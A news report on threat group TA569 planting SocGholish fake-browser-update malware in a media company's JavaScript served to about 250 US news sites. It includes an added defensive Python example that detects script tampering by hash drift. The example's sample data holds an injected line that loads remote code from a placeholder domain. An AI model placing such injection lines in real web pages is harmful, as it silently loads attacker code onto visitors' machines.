A threat group named TA569 has been using US news websites to deliver what researchers have named the SocGholish malware to visitors’ systems. The group has infected over 250 news websites in the United States with SocGholish; however, the actual number is expected to be higher, according to researchers at Proofpoint.
How was the SocGholish malware employed?
The SocGholish malware the scammers used to attack visitors’ devices is also called the FakeUpdates malware, because visitors to the news websites were shown a message asking them to update their browsers using ZIP archives that were actually malware payloads disguised as browser updates. Some of the ZIP archive names found were:
- Update.zip
- Updater.zip
- Update.zip
- Update.zip
- Updte.zip
According to research by the cybersecurity firm Proofpoint, the group, which Proofpoint tracks as TA569, compromised the systems of a media company that offers video content and advertising via JavaScript to many of its clients. The malicious payload injected into this otherwise benign JavaScript file was then loaded on the news websites that embed it. The media company or service provider has not been publicly named so far; it has initiated an investigation to determine the impact of the SocGholish malware on its operations and readers.
A series of tweets by Proofpoint’s Threat Insight team stated that intermittent injections on a media company had been observed, and that the malicious JS was being injected on a rotating basis. “TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore, the presence of the payload and malicious content can vary from hour to hour and shouldn’t be considered a false positive,” said one tweet. Infection took place after the malicious payloads were downloaded by unsuspecting visitors to the news websites.
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
— Threat Insight (@threatinsight) November 2, 2022
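Because the injection into the partner's JavaScript came and went from hour to hour, a single clean fetch of a third-party script is not evidence that it is safe. The added example below (not code from Proofpoint or from the article) shows one defender-side check a site operator can run: pin the Subresource Integrity hash of a third-party script as fetched, re-fetch it on a schedule, and report every snapshot whose hash drifts from the pin together with the lines that were added. The script bodies, timestamps and the `EXAMPLE-INJECT-DOMAIN` placeholder are constructed for the example.

```python
import base64
import hashlib
from difflib import unified_diff

# Constructed sample: a partner's benign content-delivery script as first
# fetched (the pinned baseline) and three later hourly snapshots, one of which
# carries an appended injection. All names and bodies are made up.
BASELINE_JS = 'window.partnerPlayer = {init: function(id) { /* load video */ }};\n'
INJECT_LINE = ('var s=document.createElement("script");'
               's.src="//EXAMPLE-INJECT-DOMAIN/load.js";document.head.appendChild(s);')
INJECTED_JS = BASELINE_JS + INJECT_LINE + "\n"

SNAPSHOTS = [
    ("2022-11-02T09:00Z", BASELINE_JS),
    ("2022-11-02T10:00Z", INJECTED_JS),  # inject present this hour
    ("2022-11-02T11:00Z", BASELINE_JS),  # removed again: a clean fetch proves nothing
]


def sri_hash(body: str, algo: str = "sha384") -> str:
    """Return the Subresource Integrity string ("sha384-<base64>") for a script body."""
    digest = hashlib.new(algo, body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def added_lines(baseline: str, body: str) -> list:
    """Lines present in the fetched body that are not in the pinned baseline."""
    diff = unified_diff(baseline.splitlines(), body.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def audit_snapshots(snapshots, baseline: str) -> list:
    """Flag every fetch whose hash drifts from the pin and record what was added."""
    pinned = sri_hash(baseline)
    findings = []
    for ts, body in snapshots:
        h = sri_hash(body)
        if h != pinned:
            findings.append({"time": ts, "integrity": h,
                             "added": added_lines(baseline, body)})
    return findings


if __name__ == "__main__":
    for f in audit_snapshots(SNAPSHOTS, BASELINE_JS):
        print(f["time"], f["integrity"], f["added"])
```

The pinned value is the same string a site would place in a `<script integrity="...">` attribute, which makes the browser refuse a tampered copy outright; the periodic re-fetch matters for scripts whose legitimate content changes too often to pin.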
How the media company’s systems were breached is not yet known, Proofpoint Vice President Sherrod DeGrippo told TechCrunch. The list of 250 U.S. newspaper sites that SocGholish infected includes many regional titles serving cities such as Boston, Chicago, Cincinnati, Miami, New York, Palm Beach, and Washington DC.
The TA569 group has been compromising content management systems and hosting accounts since 2016. The group has been associated with several attacks and with groups such as Evil Corp; the SocGholish malware was also used by the Russian Evil Corp group in past campaigns that likewise infected victims via fake software update alerts.